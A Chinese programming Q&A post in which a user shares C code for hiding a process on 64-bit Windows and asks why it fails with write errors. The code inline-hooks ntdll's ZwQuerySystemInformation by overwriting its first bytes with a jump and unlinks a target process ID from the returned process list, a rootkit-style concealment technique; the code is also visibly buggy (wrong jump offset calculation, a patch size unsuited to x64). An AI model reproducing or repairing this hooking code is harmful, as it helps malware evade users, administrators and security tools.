Shadow1036 2022-05-14 21:00
浏览 13
已结题

进程隐藏,下面代码总是出写入错误。我感觉是FunHook函数有问题,有没有什么问题呀?


```c

BOOL FunHook(LPCSTR OldFunName,LPVOID lpNewFun,PBYTE OldData,PBYTE NewData,LPCWSTR szModule)
{
    DWORD dwProtect;
    LONGLONG dwRelative;
    byte pbuf[9]={0xe9,0,};
    PBYTE pByte;
    LPVOID lpZwQuerySystemInformation=GetProcAddress(GetModuleHandle(szModule),OldFunName);
    pByte=(PBYTE)lpZwQuerySystemInformation;
    if (pByte[0]==0xe9)
    {
        MESSAGEBOX(L"The Fun has been hooked!");
        return FALSE;
    }
    if (!lpZwQuerySystemInformation)
    {
        MESSAGEBOX(L"Fun Hook Failed");
        return FALSE;
    }
    if (!NewData||!OldData){MESSAGEBOX(L"Data parameter transmission error!");return FALSE;}
    VirtualProtect(lpZwQuerySystemInformation,9,PAGE_EXECUTE_READWRITE,&dwProtect);
    MESSAGEBOX(L"VirtualProtect ");
    memcpy(OldData,pByte,9);
    NewData[0]=0xe9;
    dwRelative=(LONGLONG)lpNewFun-(LONGLONG)OldFunName+9;
    memcpy(NewData+1,&dwRelative,8);
    memcpy(pByte,NewData,9);
    VirtualProtect(lpZwQuerySystemInformation,9,dwProtect,&dwProtect);
    MESSAGEBOX(L"VirtualProtect Finished");
    return TRUE;
}
NTSTATUS NewZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,
                                     PVOID SystemInformation,
                                     ULONG SystemInfoemationLength,
                                     PULONG ReturnLength) //新函数
{
    NTSTATUS status;
    DWORD dwSizeNeed;
    LPVOID lpZwQuerySystemInformation=GetProcAddress(GetModuleHandle(L"ntdll.dll"),"ZwQuerySystemInformation");
    status=FunUnhook("ZwQuerySystemInformation",NewZwQuerySystemInformation,lpOldData,L"ntdll.dll");
    status=((ZWQUERYSYSTEMINFORMATION)lpZwQuerySystemInformation)(SystemProcessesAndThreadsInformation,NULL,0,&dwSizeNeed);
    if (status==0xc0000004)
    {
        MESSAGEBOX(L"进入if (status==0xc0000004)");
        PSYSTEM_PROCESS_INFORMATION proar,pforward;
        BYTE *buffer=new BYTE[dwSizeNeed];
        status=((ZWQUERYSYSTEMINFORMATION)lpZwQuerySystemInformation)(SystemProcessesAndThreadsInformation,(PVOID)buffer,dwSizeNeed,NULL);
        if (status==0)
        {
            proar = (PSYSTEM_PROCESS_INFORMATION)buffer;
            do {  
                proar=(PSYSTEM_PROCESS_INFORMATION)((LONGLONG)proar+proar->NextEntryOffset);
                if ((DWORD)proar->UniqueProcessId==dwProcessid)
                {
                    if (proar->NextEntryOffset==0)
                    {
                        pforward->NextEntryOffset=0;
                    }else
                    {
                        pforward->NextEntryOffset+=proar->NextEntryOffset;
                    }
                }
                pforward=proar;
                if (proar->NextEntryOffset==0)
                {
                    break;
                }
                proar=(PSYSTEM_PROCESS_INFORMATION)((LONGLONG)proar+proar->NextEntryOffset);
            } while ( proar->NextEntryOffset != 0 );
        }
        delete []buffer;
        buffer=NULL;
    }
    FunHook("ZwQuerySystemInformation",NewZwQuerySystemInformation,lpOldData,lpNewData,L"ntdll.dll");
    return status;
}

```

  • 写回答

1条回答 默认 最新

  • Shadow1036 2022-05-14 21:03
    关注

    以上是64位程序,不是32位

    评论

报告相同问题?

问题事件

  • 已结题 (查看结题原因) 5月15日
  • 创建了问题 5月14日

悬赏问题

  • ¥15 ubuntu子系统密码忘记
  • ¥15 信号傅里叶变换在matlab上遇到的小问题请求帮助
  • ¥15 保护模式-系统加载-段寄存器
  • ¥15 电脑桌面设定一个区域禁止鼠标操作
  • ¥15 求NPF226060磁芯的详细资料
  • ¥15 使用R语言marginaleffects包进行边际效应图绘制
  • ¥20 usb设备兼容性问题
  • ¥15 错误(10048): “调用exui内部功能”库命令的参数“参数4”不能接受空数据。怎么解决啊
  • ¥15 安装svn网络有问题怎么办
  • ¥15 vue2登录调用后端接口如何实现